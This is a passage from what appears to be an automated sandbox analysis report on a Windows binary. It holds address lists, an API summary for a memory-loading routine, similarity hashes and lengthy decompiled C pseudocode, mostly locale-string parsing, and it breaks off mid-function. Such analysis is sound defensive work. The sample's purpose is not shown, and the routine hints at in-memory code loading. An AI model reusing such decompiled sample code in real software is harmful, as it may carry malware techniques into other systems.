                                                                                                0x0040f8db
                                                                                                0x0040f80d
                                                                                                0x0040f815
                                                                                                0x0040f7ef
                                                                                                0x0040f7ef
                                                                                                0x0040f71b
                                                                                                0x0040f71b
                                                                                                0x00000000
                                                                                                0x0040f71b
                                                                                                0x0040f7d2
                                                                                                0x0040f7de
                                                                                                0x0040f7e3
                                                                                                0x0040f7e5
                                                                                                0x0040f7e8
                                                                                                0x0040f7eb
                                                                                                0x0040f7ed
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f7ed
                                                                                                0x0040f76b
                                                                                                0x0040f76b
                                                                                                0x0040f76d
                                                                                                0x0040f76d
                                                                                                0x0040f771
                                                                                                0x0040f773
                                                                                                0x0040f77a
                                                                                                0x0040f77a
                                                                                                0x0040f775
                                                                                                0x0040f775
                                                                                                0x0040f775
                                                                                                0x0040f77d
                                                                                                0x0040f77f
                                                                                                0x0040f782
                                                                                                0x0040f785
                                                                                                0x0040f785
                                                                                                0x0040f785
                                                                                                0x00000000
                                                                                                0x0040f76d
                                                                                                0x0040f716
                                                                                                0x0040f716
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 0040F188: SetLastError.KERNEL32(0000000D,0040F704,004604D4,00000000,?), ref: 0040F18E
                                                                                                • SetLastError.KERNEL32(000000C1,004604D4,00000000,?), ref: 0040F71B
                                                                                                • GetNativeSystemInfo.KERNEL32(?,004604D4,00000000,?), ref: 0040F78E
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040F7FA
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040F801
                                                                                                • SetLastError.KERNEL32(0000045A), ref: 0040F913
                                                                                                  • Part of subcall function 0040F698: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040F81A,00000000,00000000,00008000,00000000), ref: 0040F6A4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 486403682-0
                                                                                                • Opcode ID: 4f7efae13442c174d874a86dbca70fcdd373288cf4b395e8b490fd07e6231174
                                                                                                • Instruction ID: 99117d1bee9657b613627bb53c3b50fd4519fbc9ddf6da4b95ac4cc933d053df
                                                                                                • Opcode Fuzzy Hash: 4f7efae13442c174d874a86dbca70fcdd373288cf4b395e8b490fd07e6231174
                                                                                                • Instruction Fuzzy Hash: 4661F3B1A00201ABDB309F66CD81B6A77A5BF84704F14413BED04ABBC1D778DD5ACB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 73%
                                                                                                			E0043F830(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v36;
                                                                                                				signed int _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				signed int _v56;
                                                                                                				char _v276;
                                                                                                				short _v278;
                                                                                                				short _v280;
                                                                                                				char _v448;
                                                                                                				signed int _v452;
                                                                                                				signed int _v456;
                                                                                                				short _v458;
                                                                                                				intOrPtr _v460;
                                                                                                				intOrPtr _v464;
                                                                                                				signed int _v468;
                                                                                                				signed int _v472;
                                                                                                				intOrPtr _v508;
                                                                                                				char _v536;
                                                                                                				signed int _v540;
                                                                                                				intOrPtr _v544;
                                                                                                				signed int _v556;
                                                                                                				char _v708;
                                                                                                				signed int _v712;
                                                                                                				signed int _v716;
                                                                                                				short _v718;
                                                                                                				signed int* _v720;
                                                                                                				signed int _v724;
                                                                                                				signed int _v728;
                                                                                                				signed int _v732;
                                                                                                				signed int* _v736;
                                                                                                				signed int _v740;
                                                                                                				signed int _v744;
                                                                                                				signed int _v748;
                                                                                                				signed int _v752;
                                                                                                				char _v820;
                                                                                                				char _v1248;
                                                                                                				char _v1256;
                                                                                                				intOrPtr _v1276;
                                                                                                				signed int _v1292;
                                                                                                				signed int _t241;
                                                                                                				void* _t244;
                                                                                                				signed int _t247;
                                                                                                				signed int _t249;
                                                                                                				signed int _t255;
                                                                                                				signed int _t256;
                                                                                                				signed int _t257;
                                                                                                				signed int _t258;
                                                                                                				signed int _t259;
                                                                                                				signed int _t261;
                                                                                                				signed int _t263;
                                                                                                				void* _t265;
                                                                                                				signed int _t266;
                                                                                                				signed int _t267;
                                                                                                				signed int _t268;
                                                                                                				signed int _t270;
                                                                                                				signed int _t273;
                                                                                                				signed int _t280;
                                                                                                				signed int _t281;
                                                                                                				signed int _t282;
                                                                                                				intOrPtr _t283;
                                                                                                				signed int _t286;
                                                                                                				signed int _t290;
                                                                                                				signed int _t291;
                                                                                                				intOrPtr _t293;
                                                                                                				signed int _t296;
                                                                                                				signed int _t297;
                                                                                                				signed int _t299;
                                                                                                				signed int _t319;
                                                                                                				signed int _t320;
                                                                                                				signed int _t323;
                                                                                                				signed int _t328;
                                                                                                				void* _t330;
                                                                                                				signed int _t332;
                                                                                                				void* _t333;
                                                                                                				intOrPtr _t334;
                                                                                                				signed int _t339;
                                                                                                				signed int _t340;
                                                                                                				intOrPtr* _t343;
                                                                                                				signed int _t357;
                                                                                                				signed int _t359;
                                                                                                				signed int _t361;
                                                                                                				intOrPtr* _t362;
                                                                                                				signed int _t364;
                                                                                                				signed int _t370;
                                                                                                				intOrPtr* _t374;
                                                                                                				intOrPtr* _t377;
                                                                                                				void* _t380;
                                                                                                				intOrPtr* _t381;
                                                                                                				intOrPtr* _t382;
                                                                                                				signed int _t393;
                                                                                                				signed int _t396;
                                                                                                				intOrPtr* _t397;
                                                                                                				signed int _t399;
                                                                                                				signed int* _t403;
                                                                                                				intOrPtr* _t410;
                                                                                                				intOrPtr* _t411;
                                                                                                				signed int _t421;
                                                                                                				short _t422;
                                                                                                				void* _t424;
                                                                                                				signed int _t425;
                                                                                                				signed int _t427;
                                                                                                				intOrPtr _t428;
                                                                                                				signed int _t431;
                                                                                                				intOrPtr _t432;
                                                                                                				signed int _t434;
                                                                                                				signed int _t437;
                                                                                                				intOrPtr _t443;
                                                                                                				signed int _t444;
                                                                                                				signed int _t446;
                                                                                                				signed int _t447;
                                                                                                				signed int _t450;
                                                                                                				signed int _t452;
                                                                                                				signed int _t456;
                                                                                                				signed int* _t457;
                                                                                                				intOrPtr* _t458;
                                                                                                				short _t459;
                                                                                                				void* _t461;
                                                                                                				signed int _t463;
                                                                                                				signed int _t465;
                                                                                                				void* _t467;
                                                                                                				void* _t468;
                                                                                                				void* _t470;
                                                                                                				signed int _t471;
                                                                                                				void* _t472;
                                                                                                				void* _t474;
                                                                                                				signed int _t475;
                                                                                                				void* _t477;
                                                                                                				void* _t479;
                                                                                                				intOrPtr _t491;
                                                                                                
                                                                                                				_t420 = __edx;
                                                                                                				_t461 = _t467;
                                                                                                				_t468 = _t467 - 0xc;
                                                                                                				_push(__ebx);
                                                                                                				_push(__esi);
                                                                                                				_v12 = 1;
                                                                                                				_t357 = E00440C6C(__ecx, 0x6a6);
                                                                                                				_t240 = 0;
                                                                                                				_pop(_t370);
                                                                                                				if(_t357 == 0) {
                                                                                                					L20:
                                                                                                					return _t240;
                                                                                                				} else {
                                                                                                					_push(__edi);
                                                                                                					_t2 = _t357 + 4; // 0x4
                                                                                                					_t427 = _t2;
                                                                                                					 *_t427 = 0;
                                                                                                					 *_t357 = 1;
                                                                                                					_t443 = _a4;
                                                                                                					_t4 = _t443 + 0x30; // 0x43f02f
                                                                                                					_t241 = _t4;
                                                                                                					_push( *_t241);
                                                                                                					_v16 = _t241;
                                                                                                					_push(0x458510);
                                                                                                					_push( *0x4583cc);
                                                                                                					E0043F76F(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
                                                                                                					_t470 = _t468 + 0x18;
                                                                                                					_v8 = 0x4583cc;
                                                                                                					while(1) {
                                                                                                						L2:
                                                                                                						_t244 = E00449457(_t427, 0x351, ";");
                                                                                                						_t471 = _t470 + 0xc;
                                                                                                						if(_t244 != 0) {
                                                                                                							break;
                                                                                                						} else {
                                                                                                							_t8 = _v16 + 0x10; // 0x10
                                                                                                							_t410 = _t8;
                                                                                                							_t339 =  *_v16;
                                                                                                							_v16 = _t410;
                                                                                                							_t411 =  *_t410;
                                                                                                							goto L4;
                                                                                                						}
                                                                                                						while(1) {
                                                                                                							L4:
                                                                                                							_t420 =  *_t339;
                                                                                                							if(_t420 !=  *_t411) {
                                                                                                								break;
                                                                                                							}
                                                                                                							if(_t420 == 0) {
                                                                                                								L8:
                                                                                                								_t340 = 0;
                                                                                                							} else {
                                                                                                								_t420 =  *((intOrPtr*)(_t339 + 2));
                                                                                                								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
                                                                                                									break;
                                                                                                								} else {
                                                                                                									_t339 = _t339 + 4;
                                                                                                									_t411 = _t411 + 4;
                                                                                                									if(_t420 != 0) {
                                                                                                										continue;
                                                                                                									} else {
                                                                                                										goto L8;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							L10:
                                                                                                							asm("sbb eax, eax");
                                                                                                							_t370 = _v8 + 0xc;
                                                                                                							_v8 = _t370;
                                                                                                							_v12 = _v12 &  !( ~_t340);
                                                                                                							_t343 = _v16;
                                                                                                							_v16 = _t343;
                                                                                                							_push( *_t343);
                                                                                                							_push(0x458510);
                                                                                                							_push( *_t370);
                                                                                                							E0043F76F(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
                                                                                                							_t470 = _t471 + 0x18;
                                                                                                							if(_v8 < 0x4583fc) {
                                                                                                								goto L2;
                                                                                                							} else {
                                                                                                								if(_v12 != 0) {
                                                                                                									E004414D5(_t357);
                                                                                                									_t31 = _t443 + 0x28; // 0x30ff068b
                                                                                                									_t434 = _t427 | 0xffffffff;
                                                                                                									__eflags =  *_t31;
                                                                                                									if(__eflags != 0) {
                                                                                                										asm("lock xadd [ecx], eax");
                                                                                                										if(__eflags == 0) {
                                                                                                											_t32 = _t443 + 0x28; // 0x30ff068b
                                                                                                											E004414D5( *_t32);
                                                                                                										}
                                                                                                									}
                                                                                                									_t33 = _t443 + 0x24; // 0x30ff0c46
                                                                                                									__eflags =  *_t33;
                                                                                                									if( *_t33 != 0) {
                                                                                                										asm("lock xadd [eax], edi");
                                                                                                										__eflags = _t434 == 1;
                                                                                                										if(_t434 == 1) {
                                                                                                											_t34 = _t443 + 0x24; // 0x30ff0c46
                                                                                                											E004414D5( *_t34);
                                                                                                										}
                                                                                                									}
                                                                                                									 *(_t443 + 0x24) = 0;
                                                                                                									 *(_t443 + 0x1c) = 0;
                                                                                                									 *(_t443 + 0x28) = 0;
                                                                                                									 *((intOrPtr*)(_t443 + 0x20)) = 0;
                                                                                                									_t39 = _t443 + 0x40; // 0x10468b00
                                                                                                									_t240 =  *_t39;
                                                                                                								} else {
                                                                                                									_t20 = _t443 + 0x28; // 0x30ff068b
                                                                                                									_t437 = _t427 | 0xffffffff;
                                                                                                									_t491 =  *_t20;
                                                                                                									if(_t491 != 0) {
                                                                                                										asm("lock xadd [ecx], eax");
                                                                                                										if(_t491 == 0) {
                                                                                                											_t21 = _t443 + 0x28; // 0x30ff068b
                                                                                                											E004414D5( *_t21);
                                                                                                										}
                                                                                                									}
                                                                                                									_t22 = _t443 + 0x24; // 0x30ff0c46
                                                                                                									if( *_t22 != 0) {
                                                                                                										asm("lock xadd [eax], edi");
                                                                                                										if(_t437 == 1) {
                                                                                                											_t23 = _t443 + 0x24; // 0x30ff0c46
                                                                                                											E004414D5( *_t23);
                                                                                                										}
                                                                                                									}
                                                                                                									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
                                                                                                									_t26 = _t357 + 4; // 0x4
                                                                                                									_t240 = _t26;
                                                                                                									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
                                                                                                									 *(_t443 + 0x28) = _t357;
                                                                                                									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
                                                                                                								}
                                                                                                								goto L20;
                                                                                                							}
                                                                                                							goto L130;
                                                                                                						}
                                                                                                						asm("sbb eax, eax");
                                                                                                						_t340 = _t339 | 0x00000001;
                                                                                                						__eflags = _t340;
                                                                                                						goto L10;
                                                                                                					}
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					E00437736();
                                                                                                					asm("int3");
                                                                                                					_push(_t461);
                                                                                                					_t463 = _t471;
                                                                                                					_t472 = _t471 - 0x1d0;
                                                                                                					_t247 =  *0x46c00c; // 0x4cc22724
                                                                                                					_v56 = _t247 ^ _t463;
                                                                                                					_t249 = _v40;
                                                                                                					_push(_t357);
                                                                                                					_push(_t443);
                                                                                                					_t444 = _v36;
                                                                                                					_push(_t427);
                                                                                                					_t428 = _v44;
                                                                                                					_v508 = _t428;
                                                                                                					__eflags = _t249;
                                                                                                					if(_t249 == 0) {
                                                                                                						_v456 = 1;
                                                                                                						_v468 = 0;
                                                                                                						_t359 = 0;
                                                                                                						_v452 = 0;
                                                                                                						__eflags = _t444;
                                                                                                						if(__eflags == 0) {
                                                                                                							L79:
                                                                                                							E0043F830(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
                                                                                                							goto L80;
                                                                                                						} else {
                                                                                                							__eflags =  *_t444 - 0x4c;
                                                                                                							if( *_t444 != 0x4c) {
                                                                                                								L58:
                                                                                                								_push(0);
                                                                                                								_t255 = E0043F3F8(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
                                                                                                								_t474 = _t472 + 0x18;
                                                                                                								__eflags = _t255;
                                                                                                								if(_t255 != 0) {
                                                                                                									_t370 = 0;
                                                                                                									__eflags = 0;
                                                                                                									_t76 = _t428 + 0x20; // 0x43f01f
                                                                                                									_t421 = _t76;
                                                                                                									_t446 = 0;
                                                                                                									_v452 = _t421;
                                                                                                									do {
                                                                                                										__eflags = _t446;
                                                                                                										if(_t446 == 0) {
                                                                                                											L73:
                                                                                                											_t256 = _v456;
                                                                                                										} else {
                                                                                                											_t374 =  *_t421;
                                                                                                											_t257 =  &_v276;
                                                                                                											while(1) {
                                                                                                												__eflags =  *_t257 -  *_t374;
                                                                                                												_t428 = _v464;
                                                                                                												if( *_t257 !=  *_t374) {
                                                                                                													break;
                                                                                                												}
                                                                                                												__eflags =  *_t257;
                                                                                                												if( *_t257 == 0) {
                                                                                                													L66:
                                                                                                													_t370 = 0;
                                                                                                													_t258 = 0;
                                                                                                												} else {
                                                                                                													_t422 =  *((intOrPtr*)(_t257 + 2));
                                                                                                													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
                                                                                                													_v458 = _t422;
                                                                                                													_t421 = _v452;
                                                                                                													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
                                                                                                														break;
                                                                                                													} else {
                                                                                                														_t257 = _t257 + 4;
                                                                                                														_t374 = _t374 + 4;
                                                                                                														__eflags = _v458;
                                                                                                														if(_v458 != 0) {
                                                                                                															continue;
                                                                                                														} else {
                                                                                                															goto L66;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                												L68:
                                                                                                												__eflags = _t258;
                                                                                                												if(_t258 == 0) {
                                                                                                													_t359 = _t359 + 1;
                                                                                                													__eflags = _t359;
                                                                                                													goto L73;
                                                                                                												} else {
                                                                                                													_t259 =  &_v276;
                                                                                                													_push(_t259);
                                                                                                													_push(_t446);
                                                                                                													_push(_t428);
                                                                                                													L83();
                                                                                                													_t421 = _v452;
                                                                                                													_t474 = _t474 + 0xc;
                                                                                                													__eflags = _t259;
                                                                                                													if(_t259 == 0) {
                                                                                                														_t370 = 0;
                                                                                                														_t256 = 0;
                                                                                                														_v456 = 0;
                                                                                                													} else {
                                                                                                														_t359 = _t359 + 1;
                                                                                                														_t370 = 0;
                                                                                                														goto L73;
                                                                                                													}
                                                                                                												}
                                                                                                												goto L74;
                                                                                                											}
                                                                                                											asm("sbb eax, eax");
                                                                                                											_t258 = _t257 | 0x00000001;
                                                                                                											_t370 = 0;
                                                                                                											__eflags = 0;
                                                                                                											goto L68;
                                                                                                										}
                                                                                                										L74:
                                                                                                										_t446 = _t446 + 1;
                                                                                                										_t421 = _t421 + 0x10;
                                                                                                										_v452 = _t421;
                                                                                                										__eflags = _t446 - 5;
                                                                                                									} while (_t446 <= 5);
                                                                                                									__eflags = _t256;
                                                                                                									if(__eflags != 0) {
                                                                                                										goto L79;
                                                                                                									} else {
                                                                                                										__eflags = _t359;
                                                                                                										goto L77;
                                                                                                									}
                                                                                                								}
                                                                                                								goto L80;
                                                                                                							} else {
                                                                                                								__eflags =  *(_t444 + 2) - 0x43;
                                                                                                								if( *(_t444 + 2) != 0x43) {
                                                                                                									goto L58;
                                                                                                								} else {
                                                                                                									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
                                                                                                									if( *((short*)(_t444 + 4)) != 0x5f) {
                                                                                                										goto L58;
                                                                                                									} else {
                                                                                                										while(1) {
                                                                                                											_t261 = E0044A5B7(_t444, 0x458508);
                                                                                                											_t361 = _t261;
                                                                                                											_v472 = _t361;
                                                                                                											_pop(_t376);
                                                                                                											__eflags = _t361;
                                                                                                											if(_t361 == 0) {
                                                                                                												break;
                                                                                                											}
                                                                                                											_t263 = _t261 - _t444;
                                                                                                											__eflags = _t263;
                                                                                                											_v456 = _t263 >> 1;
                                                                                                											if(_t263 == 0) {
                                                                                                												break;
                                                                                                											} else {
                                                                                                												_t265 = 0x3b;
                                                                                                												__eflags =  *_t361 - _t265;
                                                                                                												if( *_t361 == _t265) {
                                                                                                													break;
                                                                                                												} else {
                                                                                                													_t431 = _v456;
                                                                                                													_t362 = 0x4583cc;
                                                                                                													_v460 = 1;
                                                                                                													do {
                                                                                                														_t266 = E0044A57D( *_t362, _t444, _t431);
                                                                                                														_t472 = _t472 + 0xc;
                                                                                                														__eflags = _t266;
                                                                                                														if(_t266 != 0) {
                                                                                                															goto L45;
                                                                                                														} else {
                                                                                                															_t377 =  *_t362;
                                                                                                															_t420 = _t377 + 2;
                                                                                                															do {
                                                                                                																_t334 =  *_t377;
                                                                                                																_t377 = _t377 + 2;
                                                                                                																__eflags = _t334 - _v468;
                                                                                                															} while (_t334 != _v468);
                                                                                                															_t376 = _t377 - _t420 >> 1;
                                                                                                															__eflags = _t431 - _t377 - _t420 >> 1;
                                                                                                															if(_t431 != _t377 - _t420 >> 1) {
                                                                                                																goto L45;
                                                                                                															}
                                                                                                														}
                                                                                                														break;
                                                                                                														L45:
                                                                                                														_v460 = _v460 + 1;
                                                                                                														_t362 = _t362 + 0xc;
                                                                                                														__eflags = _t362 - 0x4583fc;
                                                                                                													} while (_t362 <= 0x4583fc);
                                                                                                													_t359 = _v472 + 2;
                                                                                                													_t267 = E0044A52D(_t376, _t359, ";");
                                                                                                													_t428 = _v464;
                                                                                                													_t447 = _t267;
                                                                                                													_pop(_t380);
                                                                                                													__eflags = _t447;
                                                                                                													if(_t447 != 0) {
                                                                                                														L48:
                                                                                                														__eflags = _v460 - 5;
                                                                                                														if(_v460 > 5) {
                                                                                                															_t268 = _v452;
                                                                                                															goto L54;
                                                                                                														} else {
                                                                                                															_push(_t447);
                                                                                                															_t270 = E00449599(_t380,  &_v276, 0x83, _t359);
                                                                                                															_t475 = _t472 + 0x10;
                                                                                                															__eflags = _t270;
                                                                                                															if(_t270 != 0) {
                                                                                                																L82:
                                                                                                																_push(0);
                                                                                                																_push(0);
                                                                                                																_push(0);
                                                                                                																_push(0);
                                                                                                																_push(0);
                                                                                                																E00437736();
                                                                                                																asm("int3");
                                                                                                																_push(_t463);
                                                                                                																_t465 = _t475;
                                                                                                																_t273 =  *0x46c00c; // 0x4cc22724
                                                                                                																_v556 = _t273 ^ _t465;
                                                                                                																_push(_t359);
                                                                                                																_t364 = _v540;
                                                                                                																_push(_t447);
                                                                                                																_push(_t428);
                                                                                                																_t432 = _v544;
                                                                                                																_v1292 = _t364;
                                                                                                																_v1276 = E00442F68(_t364, _t380, _t420) + 0x278;
                                                                                                																_push( &_v1256);
                                                                                                																_t280 = E0043F3F8(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                                                                                                																_t477 = _t475 - 0x2e4 + 0x18;
                                                                                                																__eflags = _t280;
                                                                                                																if(_t280 != 0) {
                                                                                                																	_t101 = _t364 + 2; // 0x6
                                                                                                																	_t450 = _t101 << 4;
                                                                                                																	__eflags = _t450;
                                                                                                																	_t281 =  &_v280;
                                                                                                																	_v724 = _t450;
                                                                                                																	_t381 =  *((intOrPtr*)(_t450 + _t432));
                                                                                                																	while(1) {
                                                                                                																		_v712 = _v712 & 0x00000000;
                                                                                                																		__eflags =  *_t281 -  *_t381;
                                                                                                																		_t452 = _v724;
                                                                                                																		if( *_t281 !=  *_t381) {
                                                                                                																			break;
                                                                                                																		}
                                                                                                																		__eflags =  *_t281;
                                                                                                																		if( *_t281 == 0) {
                                                                                                																			L91:
                                                                                                																			_t282 = _v712;
                                                                                                																		} else {
                                                                                                																			_t459 =  *((intOrPtr*)(_t281 + 2));
                                                                                                																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
                                                                                                																			_v718 = _t459;
                                                                                                																			_t452 = _v724;
                                                                                                																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
                                                                                                																				break;
                                                                                                																			} else {
                                                                                                																				_t281 = _t281 + 4;
                                                                                                																				_t381 = _t381 + 4;
                                                                                                																				__eflags = _v718;
                                                                                                																				if(_v718 != 0) {
                                                                                                																					continue;
                                                                                                																				} else {
                                                                                                																					goto L91;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		}
                                                                                                																		L93:
                                                                                                																		__eflags = _t282;
                                                                                                																		if(_t282 != 0) {
                                                                                                																			_t382 =  &_v280;
                                                                                                																			_t424 = _t382 + 2;
                                                                                                																			do {
                                                                                                																				_t283 =  *_t382;
                                                                                                																				_t382 = _t382 + 2;
                                                                                                																				__eflags = _t283 - _v712;
                                                                                                																			} while (_t283 != _v712);
                                                                                                																			_v728 = (_t382 - _t424 >> 1) + 1;
                                                                                                																			_t286 = E00440C6C(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
                                                                                                																			_v740 = _t286;
                                                                                                																			__eflags = _t286;
                                                                                                																			if(_t286 == 0) {
                                                                                                																				goto L84;
                                                                                                																			} else {
                                                                                                																				_v732 =  *((intOrPtr*)(_t452 + _t432));
                                                                                                																				_t125 = _t364 * 4; // 0xb8bf
                                                                                                																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
                                                                                                																				_t128 = _t432 + 8; // 0x8b56ff8b
                                                                                                																				_v748 =  *_t128;
                                                                                                																				_t391 =  &_v280;
                                                                                                																				_v720 = _t286 + 4;
                                                                                                																				_t290 = E004428B4(_t286 + 4, _v728,  &_v280);
                                                                                                																				_t479 = _t477 + 0xc;
                                                                                                																				__eflags = _t290;
                                                                                                																				if(_t290 != 0) {
                                                                                                																					_t291 = _v712;
                                                                                                																					_push(_t291);
                                                                                                																					_push(_t291);
                                                                                                																					_push(_t291);
                                                                                                																					_push(_t291);
                                                                                                																					_push(_t291);
                                                                                                																					E00437736();
                                                                                                																					asm("int3");
                                                                                                																					_t293 =  *0x46d508; // 0x0
                                                                                                																					return _t293;
                                                                                                																				} else {
                                                                                                																					__eflags = _v280 - 0x43;
                                                                                                																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
                                                                                                																					if(_v280 != 0x43) {
                                                                                                																						L102:
                                                                                                																						_t296 = E0043F105(_t364, _t391, _t432,  &_v708);
                                                                                                																						_t393 = _v712;
                                                                                                																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
                                                                                                																					} else {
                                                                                                																						__eflags = _v278;
                                                                                                																						if(_v278 != 0) {
                                                                                                																							goto L102;
                                                                                                																						} else {
                                                                                                																							_t393 = _v712;
                                                                                                																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
                                                                                                																						}
                                                                                                																					}
                                                                                                																					__eflags = _t364 - 2;
                                                                                                																					if(_t364 != 2) {
                                                                                                																						__eflags = _t364 - 1;
                                                                                                																						if(_t364 != 1) {
                                                                                                																							__eflags = _t364 - 5;
                                                                                                																							if(_t364 == 5) {
                                                                                                																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
                                                                                                																							}
                                                                                                																						} else {
                                                                                                																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t457 = _v736;
                                                                                                																						_t425 = _t393;
                                                                                                																						_t403 = _t457;
                                                                                                																						 *(_t432 + 8) = _v716;
                                                                                                																						_v720 = _t457;
                                                                                                																						_v728 = _t457[8];
                                                                                                																						_v716 = _t457[9];
                                                                                                																						while(1) {
                                                                                                																							_t154 = _t432 + 8; // 0x8b56ff8b
                                                                                                																							__eflags =  *_t154 -  *_t403;
                                                                                                																							if( *_t154 ==  *_t403) {
                                                                                                																								break;
                                                                                                																							}
                                                                                                																							_t458 = _v720;
                                                                                                																							_t425 = _t425 + 1;
                                                                                                																							_t328 =  *_t403;
                                                                                                																							 *_t458 = _v728;
                                                                                                																							_v716 = _t403[1];
                                                                                                																							_t403 = _t458 + 8;
                                                                                                																							 *((intOrPtr*)(_t458 + 4)) = _v716;
                                                                                                																							_t364 = _v752;
                                                                                                																							_t457 = _v736;
                                                                                                																							_v728 = _t328;
                                                                                                																							_v720 = _t403;
                                                                                                																							__eflags = _t425 - 5;
                                                                                                																							if(_t425 < 5) {
                                                                                                																								continue;
                                                                                                																							} else {
                                                                                                																							}
                                                                                                																							L110:
                                                                                                																							__eflags = _t425 - 5;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_t178 = _t432 + 8; // 0x8b56ff8b
                                                                                                																								_t319 = E0044A5FC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x458488, 0x7f,  &_v536,  *_t178, 1);
                                                                                                																								_t479 = _t479 + 0x1c;
                                                                                                																								__eflags = _t319;
                                                                                                																								_t320 = _v712;
                                                                                                																								if(_t319 == 0) {
                                                                                                																									_t457[1] = _t320;
                                                                                                																								} else {
                                                                                                																									do {
                                                                                                																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
                                                                                                																										_t320 = _t320 + 1;
                                                                                                																										__eflags = _t320 - 0x7f;
                                                                                                																									} while (_t320 < 0x7f);
                                                                                                																									_t323 = E00434641( &_v536,  *0x46c160, 0xfe);
                                                                                                																									_t479 = _t479 + 0xc;
                                                                                                																									__eflags = _t323;
                                                                                                																									_t457[1] = 0 | _t323 == 0x00000000;
                                                                                                																								}
                                                                                                																								_t193 = _t432 + 8; // 0x8b56ff8b
                                                                                                																								 *_t457 =  *_t193;
                                                                                                																							}
                                                                                                																							 *(_t432 + 0x18) = _t457[1];
                                                                                                																							goto L121;
                                                                                                																						}
                                                                                                																						__eflags = _t425;
                                                                                                																						if(_t425 != 0) {
                                                                                                																							 *_t457 =  *(_t457 + _t425 * 8);
                                                                                                																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
                                                                                                																							 *(_t457 + _t425 * 8) = _v728;
                                                                                                																							 *(_t457 + 4 + _t425 * 8) = _v716;
                                                                                                																						}
                                                                                                																						goto L110;
                                                                                                																					}
                                                                                                																					L121:
                                                                                                																					_t297 = _t364 * 0xc;
                                                                                                																					_t200 = _t297 + 0x4583c8; // 0x40ddd6
                                                                                                																					 *0x45449c(_t432);
                                                                                                																					_t299 =  *((intOrPtr*)( *_t200))();
                                                                                                																					_t396 = _v732;
                                                                                                																					__eflags = _t299;
                                                                                                																					if(_t299 == 0) {
                                                                                                																						__eflags = _t396 - 0x46c298;
                                                                                                																						if(_t396 != 0x46c298) {
                                                                                                																							_t456 = _t364 + _t364;
                                                                                                																							__eflags = _t456;
                                                                                                																							asm("lock xadd [eax], ecx");
                                                                                                																							if(_t456 != 0) {
                                                                                                																								goto L126;
                                                                                                																							} else {
                                                                                                																								_t218 = _t456 * 8; // 0x30ff068b
                                                                                                																								E004414D5( *((intOrPtr*)(_t432 + _t218 + 0x28)));
                                                                                                																								_t221 = _t456 * 8; // 0x30ff0c46
                                                                                                																								E004414D5( *((intOrPtr*)(_t432 + _t221 + 0x24)));
                                                                                                																								_t224 = _t364 * 4; // 0xb8bf
                                                                                                																								E004414D5( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
                                                                                                																								_t399 = _v712;
                                                                                                																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
                                                                                                																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
                                                                                                																							}
                                                                                                																						}
                                                                                                																						_t397 = _v740;
                                                                                                																						 *_t397 = 1;
                                                                                                																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
                                                                                                																					} else {
                                                                                                																						 *(_v724 + _t432) = _t396;
                                                                                                																						_t205 = _t364 * 4; // 0xb8bf
                                                                                                																						E004414D5( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
                                                                                                																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
                                                                                                																						E004414D5(_v740);
